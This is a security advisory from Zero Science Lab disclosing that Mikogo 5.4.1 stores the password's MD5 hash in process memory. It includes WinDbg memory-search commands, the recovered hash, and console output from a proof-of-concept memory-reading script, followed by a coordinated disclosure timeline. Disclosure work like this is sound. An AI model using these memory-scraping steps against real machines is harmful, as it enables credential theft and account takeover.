Mikogo 5.4.1.160608 Local Credentials Disclosure

Title: Mikogo 5.4.1.160608 Local Credentials Disclosure
Advisory ID: ZSL-2017-5439
Type: Local
Impact: Exposure of Sensitive Information, Security Bypass
Risk: (3/5)
Release Date: 23.10.2017
Summary
Mikogo is a desktop sharing software application for web conferencing and remote support, and is provided by the online collaboration provider, BeamYourScreen GmbH. Mikogo provides its software as native downloads for Windows, Mac OS X, Linux, iOS and Android.
Description
Mikogo is vulnerable to local credentials disclosure, the supplied password is stored as a MD5 hash format in memory process. A potential attacker could reveal the supplied password hash and re-use it or store it via the configuration file in order to gain access to the account.

--------------------------------------------------------------------------------

0:017> s -a 0 L?80000000 "password="
0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..&lang
0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma
06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811
0:017> da 06a422b3
06a422b3 "password=482C811DA5D5B4BC6D497FF"
06a422d3 "A98491E38...."

...
...

C:\Users\Charlie\Desktop>python mikogo_mem.py
[~] Searching for pid by process name 'Mikogo-host.exe'..
[+] Found process with pid #1116
[~] Trying to read memory for pid #1116
[+] Credentials found!
----------------------------------------
[+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38

--------------------------------------------------------------------------------

Vendor
Snapview GmbH - https://www.mikogo.com
Affected Version
5.4.1.160608
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Vendor Status
[03.07.2017] Vulnerability discovered.
[12.07.2017] Vendor contacted.
[12.07.2017] Vendor responds asking more details.
[12.07.2017] Sent details to the vendor.
[13.07.2017] Vendor is investigating the issue.
[31.07.2017] Asked vendor for status update.
[01.08.2017] Vendor responds confirming the issue, planning to improve the way they store authentication information in their configuration file and how it is computed in the systems memory. Plans to release a fix together with further improvements in version 5.7.x within the next three months.
[01.08.2017] Replied to the vendor.
[14.08.2017] Asked vendor for status update.
[26.08.2017] No response from the vendor.
[27.08.2017] Asked vendor for status update.
[29.08.2017] Vendor responds, they are in finalization phase containing quality assurance and infrastructure preparations. Plans to release latest in November.
[23.10.2017] Vendor releases version 5.9.0 to address this issue.
[23.10.2017] Coordinated public security advisory released.
PoC
mikogo_mem.py
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] https://www.mikogo.com/2017/10/23/new-mikogo-release/
[2] https://mikogo.zendesk.com/hc/en-us/articles/200453033-Release-Notes
[3] https://www.exploit-db.com/exploits/43033/
[4] https://exchange.xforce.ibmcloud.com/vulnerabilities/134057
[5] https://packetstormsecurity.com/files/144715
[6] https://cxsecurity.com/issue/WLB-2017100181
Changelog
[23.10.2017] - Initial release
[26.10.2017] - Added reference [3], [4], [5] and [6]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk